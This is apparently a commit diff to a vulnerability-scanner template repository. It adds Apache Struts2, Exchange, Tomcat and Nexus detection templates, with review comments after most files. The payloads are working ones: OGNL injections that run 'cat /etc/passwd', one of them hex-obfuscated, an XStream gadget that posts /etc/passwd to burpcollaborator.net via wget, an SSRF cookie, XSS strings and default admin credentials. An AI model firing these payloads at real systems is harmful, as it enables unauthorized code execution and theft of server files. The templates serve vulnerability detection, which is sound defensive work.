commit
bbf5bf4b5a
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
|
| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 |
|
||||||
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
|
| exposures | 60 | technologies | 50 | misconfiguration | 51 |
|
||||||
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
|
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**69 directories, 672 files**.
|
**72 directories, 687 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
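--- /dev/null
+++ b/CVE-2007-4556.yaml
@@ -0,0 +1,29 @@
+id: CVE-2007-4556
+
+info:
+  name: Apache Struts2 S2-001 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://www.guildhab.top/?p=2326
+  tags: cve,cve2007,apache,rce,struts
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/login.action"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200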
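Review bot: The only success oracle is the regex `root:[x*]:0:0` on the body, so the template runs `cat /etc/passwd` through `java.lang.ProcessBuilder` on every target merely to prove OGNL evaluation, and any non-Linux Struts host is silently reported clean. An OS-neutral and far less intrusive oracle is to have the server evaluate and echo an expression, e.g. `password=%25%7B1337*1337%7D` matched with the regex `1787569`, which removes the command execution entirely. The `/login.action` path is the S2-001 showcase form; a comment such as `# login.action is the S2-001 showcase action; real apps expose the bug on any OGNL-evaluated form field` would stop a miss being read as not-vulnerable. The `reference:` is a third-party blog post; adding the NVD or Apache advisory URL, as the other new templates in this commit do, would make the severity claim checkable.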
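--- /dev/null
+++ b/CVE-2012-0392.yaml
@@ -0,0 +1,24 @@
+id: CVE-2012-0392
+
+info:
+  name: Apache Struts2 S2-008 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
+  tags: cve, cve2012,apache,rce,struts
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200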
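Review bot: `tags: cve, cve2012,apache,rce,struts` carries a space after the first comma, unlike every other template in this commit; depending on how the loader splits the tag string this may register ` cve2012` rather than `cve2012`, so write `tags: cve,cve2012,apache,rce,struts`. The request only works through `/devmode.action?debug=command`, i.e. when Struts devMode is enabled on the target, which the `info` block never states; a `description:` giving that prerequisite and noting that the payload runs `cat /etc/passwd` via `java.lang.Runtime` would let operators decide whether the template is appropriate for their engagement. As with the other S2 templates here, the `root:[x*]:0:0` regex can never match on a Windows host, so those are reported clean.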
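--- /dev/null
+++ b/CVE-2013-1965.yaml
@@ -0,0 +1,28 @@
+id: CVE-2013-1965
+
+info:
+  name: Apache Struts2 S2-012 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
+  tags: cve,cve2013,apache,rce,struts
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/user.action"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200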
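Review bot: The regex matcher has no `part:`, while the CVE-2007-4556 template in this same commit sets `part: body` for the identical `root:[x*]:0:0` check; add `part: body` here so the two read the same and the intent is explicit rather than relying on the default. `/user.action` with a `name=` field is the S2-012 showcase form, so a miss on a differently structured application says nothing about the patch level; a one-line `description:` stating that, and that the payload executes `cat /etc/passwd` through `ProcessBuilder`, would set expectations. The template has no `description:` at all even though it references NVD, which has one ready to paste.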
@ -5,7 +5,7 @@ info:
|
||||||
author: exploitation & @dwisiswant0
|
author: exploitation & @dwisiswant0
|
||||||
severity: critical
|
severity: critical
|
||||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||||
tags: cve,cve2013,rce
|
tags: cve,cve2013,rce,struts,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- payloads:
|
- payloads:
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2016-3081
|
id: CVE-2016-3081
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: S2-032 Struts RCE
|
name: Apache S2-032 Struts RCE
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
|
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
|
||||||
tags: cve,cve2016,struts,rce
|
tags: cve,cve2016,struts,rce,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
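--- /dev/null
+++ b/CVE-2017-12611.yaml
@@ -0,0 +1,24 @@
+id: CVE-2017-12611
+
+info:
+  name: Apache Struts2 S2-053 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
+  tags: cve,cve2017,apache,rce,struts
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200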
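Review bot: The OGNL payload branches on `os.name` to run the command through `cmd.exe /c` on Windows, yet the only body matcher is `root:[x*]:0:0`, so the Windows branch can never yield a match and those hosts are reported clean; either add a Windows-capable oracle or drop the branch and say so in a comment. The request is a POST whose entire payload sits in the query string (`/?name=%25%7B...`) with no body and no Content-Type, which only works where the application renders the `name` parameter inside a Freemarker tag attribute; a `description:` stating that prerequisite would explain a miss. An OS-neutral oracle such as echoing a fixed token instead of `cat /etc/passwd` would serve the matcher equally well without reading a system file on the target.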
@ -1,10 +1,10 @@
|
||||||
id: CVE-2017-5638
|
id: CVE-2017-5638
|
||||||
info:
|
info:
|
||||||
author: "Random Robbie"
|
author: Random Robbie
|
||||||
name: "Struts2 RCE "
|
name: Apache Struts2 RCE
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||||
tags: cve,cve2017,struts,rce
|
tags: cve,cve2017,struts,rce,apache
|
||||||
|
|
||||||
# This template supports the detection part only.
|
# This template supports the detection part only.
|
||||||
# Do not test any website without permission
|
# Do not test any website without permission
|
||||||
|
|
|
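--- /dev/null
+++ b/CVE-2017-9791.yaml
@@ -0,0 +1,33 @@
+id: CVE-2017-9791
+
+info:
+  name: Apache Struts2 S2-053 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
+  tags: cve, cve2017,apache,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/integration/saveGangster.action"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Content-Type: text/html"
+        part: header
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200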
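Review bot: `name: Apache Struts2 S2-053 RCE` duplicates the name of the CVE-2017-12611 template added in this same commit, yet this request targets `/integration/saveGangster.action`, the Struts 1 plugin showcase; give it its own advisory id from the NVD entry at `reference:` (I believe this CVE is tracked as S2-048 — please confirm) so two different CVEs do not report under one name. `tags: cve, cve2017,apache,rce` has a stray space and omits the `struts` tag that every other Struts template in this commit carries, so `-tags struts` would skip it; use `tags: cve,cve2017,apache,rce,struts`. The body is fully hex-encoded, which hides that it runs `cat /etc/passwd` through `java.lang.Runtime`; a comment above `body:` giving the decoded OGNL would make the template reviewable without a decoder.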
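--- /dev/null
+++ b/CVE-2017-9805.yaml
@@ -0,0 +1,87 @@
+id: CVE-2017-9805
+
+info:
+  name: Apache Struts2 S2-052 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
+  tags: cve,cve2017,apache,rce,struts
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/struts2-rest-showcase/orders/3"
+      - "{{BaseURL}}/orders/3"
+    headers:
+      Content-Type: application/xml
+    body: |
+      <map>
+      <entry>
+      <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+      <dataHandler>
+      <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+      <is class="javax.crypto.CipherInputStream">
+      <cipher class="javax.crypto.NullCipher">
+      <initialized>false</initialized>
+      <opmode>0</opmode>
+      <serviceIterator class="javax.imageio.spi.FilterIterator">
+      <iter class="javax.imageio.spi.FilterIterator">
+      <iter class="java.util.Collections$EmptyIterator"/>
+      <next class="java.lang.ProcessBuilder">
+      <command>
+      <string>wget</string>
+      <string>--post-file</string>
+      <string>/etc/passwd</string>
+      <string>burpcollaborator.net</string>
+      </command>
+      <redirectErrorStream>false</redirectErrorStream>
+      </next>
+      </iter>
+      <filter class="javax.imageio.ImageIO$ContainsFilter">
+      <method>
+      <class>java.lang.ProcessBuilder</class>
+      <name>start</name>
+      <parameter-types/>
+      </method>
+      <name>asdasd</name>
+      </filter>
+      <next class="string">asdasd</next>
+      </serviceIterator>
+      <lock/>
+      </cipher>
+      <input class="java.lang.ProcessBuilder$NullInputStream"/>
+      <ibuffer></ibuffer>
+      <done>false</done>
+      <ostart>0</ostart>
+      <ofinish>0</ofinish>
+      <closed>false</closed>
+      </is>
+      <consumed>false</consumed>
+      </dataSource>
+      <transferFlavors/>
+      </dataHandler>
+      <dataLen>0</dataLen>
+      </value>
+      </jdk.nashorn.internal.objects.NativeString>
+      <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+      </entry>
+      <entry>
+      <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+      <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+      </entry>
+      </map>
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Debugging information"
+          - "com.thoughtworks.xstream.converters.collections.MapConverter"
+        condition: and
+
+      - type: status
+        status:
+          - 500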
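Review bot: The deserialization gadget's `<command>` runs `wget --post-file /etc/passwd burpcollaborator.net`, which uploads the target's `/etc/passwd` to a public host the operator does not control, while the matchers (`Debugging information`, `MapConverter`, status 500) never look at that callback — the exfiltration contributes nothing to detection. Replace the four `<string>` entries with a benign, side-effect-free command (a bare `<string>true</string>` is enough to keep the gadget chain intact) and add a comment above `body:` such as `# the command's output is never consulted; detection keys on the XStream error page, so keep the command harmless`. Because the match is an XStream converter error rather than observed execution, it is worth saying in a `description:` that this is an error-page heuristic; a `part: body` on the word matcher would also make the scope explicit, matching the header/body split used in the CVE-2017-9791 template of this commit.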
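--- /dev/null
+++ b/CVE-2018-11776.yaml
@@ -0,0 +1,24 @@
+id: CVE-2018-11776
+
+info:
+  name: Apache Struts2 S2-057 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://github.com/jas502n/St2-057
+  tags: cve,cve2018,apache,rce,struts2
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200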
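Review bot: `tags: cve,cve2018,apache,rce,struts2` uses `struts2` where every other Struts template in this commit uses `struts`, so a `-tags struts` run would silently miss this one; change it to `struts` (or carry both). The namespace payload is followed by `/actionChain1.action`, the S2-057 showcase action, and by the advisory the bug needs `alwaysSelectFullNamespace` enabled with an action that has no namespace set — worth confirming and stating in a `description:` so a miss is not read as patched. The `reference:` is a third-party PoC repository; adding the NVD or Apache S2-057 advisory URL alongside it would match the other templates here.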
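--- /dev/null
+++ b/CVE-2019-0221.yaml
@@ -0,0 +1,34 @@
+id: CVE-2019-0221
+
+info:
+  name: Apache Tomcat XSS
+  author: pikpikcu
+  severity: low
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
+  description: |
+    The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
+    7.0.0 to 7.0.93 echoes user provided data without escaping and is,
+    therefore, vulnerable to XSS. SSI is disabled by default.
+    The printenv command is intended for debugging and is unlikely to be present in a production website.
+  tags: cve,cve2019,apache,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<script>alert('xss')</script>"
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200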
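Review bot: The body matcher only checks that the literal `<script>alert('xss')</script>` came back in an HTML 200 response, which a catch-all handler that echoes the request URI into a page would satisfy just as well; since the description says the SSI `printenv` command is what reflects the data, also require a printenv-specific marker (the name of a CGI/environment variable it prints, to be confirmed against a live page) so the match is tied to the vulnerable handler. Add `part: body` to the first word matcher so it reads consistently with the `part: header` matcher beside it. The `description:` already notes SSI is off by default and `printenv` is a debugging aid, which is useful context for the `low` severity.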
@ -6,9 +6,7 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
|
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
|
||||||
tags: cve,cve2020,zoho,traversal
|
tags: cve,cve2020,zoho,traversal
|
||||||
|
reference: https://github.com/BeetleChunks/CVE-2020-12116
|
||||||
# References:
|
|
||||||
# - https://github.com/BeetleChunks/CVE-2020-12116
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
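--- a/CVE-2020-14815.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2020-14815
-
-info:
-  name: Oracle Business Intelligence XSS
-  author: pikpikcu
-  severity: medium
-  reference: https://www.oracle.com/security-alerts/cpuoct2020.html
-  tags: cve,cve2020,oracle,xss
-  source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "X-Oracle-Dms-Ecid:"
-          - "X-Oracle-Dms-Rid:"
-          - "Set-Cookie:"
-        part: header
-        condition: and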
@ -5,7 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
|
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
|
||||||
tags: cve,cve2020,apache,rce
|
tags: cve,cve2020,apache,rce,struts
|
||||||
|
|
||||||
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
|
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
|
||||||
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
|
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
|
||||||
|
|
|
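--- /dev/null
+++ b/CVE-2021-26855.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-26855
+
+info:
+  name: Exchange Server SSRF Vulnerability
+  author: madrobot
+  severity: critical
+  description: |
+    Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+  tags: cve,cve2021,ssrf,rce,exchange
+  reference: |
+    - https://proxylogon.com/#timeline
+    - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+    - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+    - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+
+requests:
+  - raw:
+      - |
+        GET /owa/auth/x.js HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+        Accept-Language: en
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Burp Collaborator Server"
+        part: body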
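Review bot: Detection hinges on the Exchange server fetching `burpcollaborator.net/ecp/default.flt` via the `X-AnonResource-Backend` cookie and returning a body containing `Burp Collaborator Server`, so any Exchange host without outbound Internet access is reported clean, and every scanned server is made to contact a third-party host on the operator's behalf. The Microsoft nse script listed under `reference:` uses a `localhost` backend and keys on the server's own error response instead (I recall a `NegotiateSecurityContext` marker — confirm from the script); switching to that form removes both the egress dependency and the external callout. The `description:` says "Remote Code Execution" while `name:` says SSRF; the request only exercises the SSRF leg, so the description should say that this template confirms the SSRF, not the full chain.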
@ -24,7 +24,7 @@ requests:
|
||||||
|
|
||||||
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
||||||
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
||||||
Content-Type: imnage/png
|
Content-Type: image/png
|
||||||
|
|
||||||
POC_TEST
|
POC_TEST
|
||||||
|
|
||||||
|
|
|
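--- /dev/null
+++ b/nexus-default-password.yaml
@@ -0,0 +1,31 @@
+id: nexus-default-password
+
+info:
+  name: Nexus Default Password
+  author: pikpikcu
+  severity: high
+  tags: nexus,dlogin
+
+requests:
+  - raw:
+      - |
+        POST /service/rapture/session HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 43
+        X-Nexus-UI: true
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Connection: close
+
+        username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 204
+      - type: word
+        words:
+          - "Server: Nexus"
+          - "NXSESSIONID"
+        part: header
+        condition: and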
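Review bot: The credentials in the raw body are opaque — `YWRtaW4%3D` / `YWRtaW4xMjM%3D` are URL-encoded base64 for `admin` / `admin123` — so add a comment above the `- |` block: `# Nexus UI login with the factory default admin/admin123 (base64, '=' URL-encoded); Content-Length below matches this exact body`. The hand-written `Content-Length: 43` is correct for that body but will silently break if anyone edits the credentials; drop it if the raw-request engine recomputes the header (to be confirmed), otherwise the comment above at least records the dependency. A successful match means the template created a real authenticated session on the target (the `NXSESSIONID` cookie it looks for), which belongs in a `description:` so operators know this template logs in rather than fingerprints. `tags: nexus,dlogin` should use whatever tag the other templates in the `default-logins` directory use so the directory can be selected by tag.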
@ -10,6 +10,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/.hg/hgrc"
|
- "{{BaseURL}}/.hg/hgrc"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
@ -19,4 +20,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: phpinfo Disclosure
|
name: phpinfo Disclosure
|
||||||
author: pd-team & daffainfo
|
author: pd-team & daffainfo & meme-lord
|
||||||
severity: low
|
severity: low
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -25,9 +25,22 @@ requests:
|
||||||
- "{{BaseURL}}/infos.php"
|
- "{{BaseURL}}/infos.php"
|
||||||
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
||||||
- "{{BaseURL}}/php-info.php"
|
- "{{BaseURL}}/php-info.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "PHP Extension"
|
- "PHP Extension"
|
||||||
- "PHP Version"
|
- "PHP Version"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Apache Struts setup in Debug-Mode
|
name: Apache Struts setup in Debug-Mode
|
||||||
author: pd-team
|
author: pd-team
|
||||||
severity: low
|
severity: low
|
||||||
tags: logs,struts
|
tags: logs,struts,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
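--- /dev/null
+++ b/gitlab-snippets.yaml
@@ -0,0 +1,21 @@
+id: gitlab-snippets
+info:
+  name: GitLab public snippets
+  author: pdteam
+  severity: info
+  reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/explore/snippets"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Snippets · Explore · GitLab</title>'
+
+      - type: status
+        status:
+          - 200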
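Review bot: The matcher only confirms that `/explore/snippets` renders the Explore page (`<title>Snippets · Explore · GitLab</title>` with a 200), not that any public snippet is listed, so an instance with nothing exposed still reports under the name `GitLab public snippets`; either rename it to say it detects the public explore endpoint, or add a second word matcher for a snippet entry in the listing (markup to be confirmed against a live instance). The `info` block has no `tags:` line, unlike every other template in this commit, so it cannot be selected or excluded by tag; add e.g. `tags: gitlab,exposure`.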
@ -1,4 +1,4 @@
|
||||||
id: microsoft-echange-server-detect
|
id: microsoft-exchange-server-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Microsoft Exchange Server Detect
|
name: Microsoft Exchange Server Detect
|
||||||
|
